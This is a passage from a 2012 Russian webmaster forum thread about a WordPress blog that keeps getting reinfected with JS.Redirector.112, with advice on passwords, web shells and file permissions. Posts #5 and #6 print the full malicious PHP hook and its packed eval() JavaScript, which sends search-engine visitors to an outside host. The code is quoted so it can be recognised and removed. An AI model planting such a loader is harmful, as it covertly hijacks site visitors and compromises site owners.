Как защититься от JS.Redirector.112

109

ORIGAMMI

20 апреля 2012, 18:57

2117

У меня блог на 3 вордпрессе, периодически возникает вот эта зараза JS.Redirector.112

Удаляю все из файлов подозрительное , а потом через неделю все равно вылазит.

Как распрощаться. Перекачиваю на комп все файлы в которых есть вирус правлю и снова на хостинг. проходит пару недель и опять таже фигня. Что делать ?

675

vandamme

20 апреля 2012, 19:08

#1

фтп пароль поменяй? запрети входить на фтп всем, кроме своего ip

OI

109

ORIGAMMI

20 апреля 2012, 19:14

#2

Я даже на другой хостинг перешел. блин поменяю. Мот он в моем компе как то прописался ?

675

vandamme

20 апреля 2012, 19:44

#3

ну возможно, антималваре скачай, комп проверь

R

180

Алексей

20 апреля 2012, 20:40

#4

Был клиент, который не сохранял пароли от фтп в программе также постоянно заражались файлы, причина была в шелле, запускался скрипт именно через него. Смотрите внимательнее!

Удаление вирусов с сайта, защита сайта, Гарантия! ( /ru/forum/999073 ) -> топик на маулталк ( http://www.maultalk.com/topic113834s0.html ) -> Топик в сапе ( http://forum.sape.ru/showthread.php?t=79363 ). TELEGRAM - https://t.me/Doktorsaitov

78

WebGomel

20 апреля 2012, 20:56

#5

JS.Redirector.112 ваш это дописанный в function.php темы код вида:

<?php  

add_action('get_footer', 'add_sscounter'); 

function add_sscounter(){ 

echo '<!--scounter-->'; 

if(function_exists('is_user_logged_in')){ 

if(time()%2 == 0 && !is_user_logged_in()){     

echo "<script language=\"JavaScript\">eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r***91;e(c)***93;=k***91;c***93;||e(c);k=***91;function(e){return r***91;e***93;}***93;;e=function(){return'\\\w+'};c=1};while(c--)if(k***91;c***93;)p=p.replace(new RegExp('\\\b'+e(c)+'\\\b','g'),k***91;c***93;);return p}('e r=x.9,t=\"\",q;4(r.3(\"m.\")!=-1)t=\"q\";4(r.3(\"7.\")!=-1)t=\"q\";4(r.3(\"8.\")!=-1)t=\"p\";4(r.3(\"a.\")!=-1)t=\"q\";4(r.3(\"f.\")!=-1)t=\"g\";4(r.3(\"j.\")!=-1)t=\"q\";4(t.6&&((q=r.3(\"?\"+t+\"=\"))!=-1||(q=r.3(\"&\"+t+\"=\"))!=-1))B.C=\"v\"+\"w\"+\":/\"+\"/A\"+\"b\"+\"k\"+\"5\"+\"h.\"+\"c\"+\"z/s\"+\"u\"+\"5\"+\"h.p\"+\"d?\"+\"t\"+\"y=1&t\"+\"i\"+\"l=\"+r.n(q+2+t.6).o(\"&\")***91;0***93;;',39,39,'|||indexOf|if|rc|length|msn|yahoo|referrer|altavista|ogo|bi|hp|var|aol|query||er|ask|sea|ms|google|substring|split||||||ea|ht|tp|document|||go|window|location'.split('|'),0,{}))</script>"; 

} 

} 

} 

?>

Это надо удалить. и да, менять пароли, искать шеллы :)

Удалённый системный администратор ( https://remadmin.com )

OI

109

ORIGAMMI

21 апреля 2012, 20:03

#6

WebGomel:
JS.Redirector.112 ваш это дописанный в function.php темы код вида:

<?php  

add_action('get_footer', 'add_sscounter'); 

function add_sscounter(){ 

echo '<!--scounter-->'; 

if(function_exists('is_user_logged_in')){ 

if(time()%2 == 0 && !is_user_logged_in()){     

echo "<script language=\"JavaScript\">eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r***91;e(c)***93;=k***91;c***93;||e(c);k=***91;function(e){return r***91;e***93;}***93;;e=function(){return'\\\w+'};c=1};while(c--)if(k***91;c***93;)p=p.replace(new RegExp('\\\b'+e(c)+'\\\b','g'),k***91;c***93;);return p}('e r=x.9,t=\"\",q;4(r.3(\"m.\")!=-1)t=\"q\";4(r.3(\"7.\")!=-1)t=\"q\";4(r.3(\"8.\")!=-1)t=\"p\";4(r.3(\"a.\")!=-1)t=\"q\";4(r.3(\"f.\")!=-1)t=\"g\";4(r.3(\"j.\")!=-1)t=\"q\";4(t.6&&((q=r.3(\"?\"+t+\"=\"))!=-1||(q=r.3(\"&\"+t+\"=\"))!=-1))B.C=\"v\"+\"w\"+\":/\"+\"/A\"+\"b\"+\"k\"+\"5\"+\"h.\"+\"c\"+\"z/s\"+\"u\"+\"5\"+\"h.p\"+\"d?\"+\"t\"+\"y=1&t\"+\"i\"+\"l=\"+r.n(q+2+t.6).o(\"&\")***91;0***93;;',39,39,'|||indexOf|if|rc|length|msn|yahoo|referrer|altavista|ogo|bi|hp|var|aol|query||er|ask|sea|ms|google|substring|split||||||ea|ht|tp|document|||go|window|location'.split('|'),0,{}))</script>"; 

} 

} 

} 

?>

Это надо удалить. и да, менять пароли, искать шеллы :)

да именно это фигня. Смена паролей не дает эффекта , остается шелл. Как его искать ?

[Удален]

21 апреля 2012, 20:39

#7

Поставьте на functions.php права записи 444.

У меня с тех пор ни один сайт не заболел, рекомендую.

1609

SeVlad

22 апреля 2012, 16:59

#8

ORIGAMMI:
Как его искать ?

См. сюда и сюда. А потом сюда или сюда

Делаю хорошие сайты хорошим людям. Предпочтение коммерческим направлениям. Связь со мной через http://wp.me/P3YHjQ-3.

OI

109

ORIGAMMI

30 апреля 2012, 15:01

#9

Парни нашел в phpadmin во вкладке базы данных: information_schema (не знаю что это такое, не моя база данных..может эт дистрибутив?) следующие 1 соответствие в таблице PROCESSLIST , открываю обзор и вижу:

SELECT *

FROM `information_schema`.`PROCESSLIST`

WHERE (

CONVERT( `ID`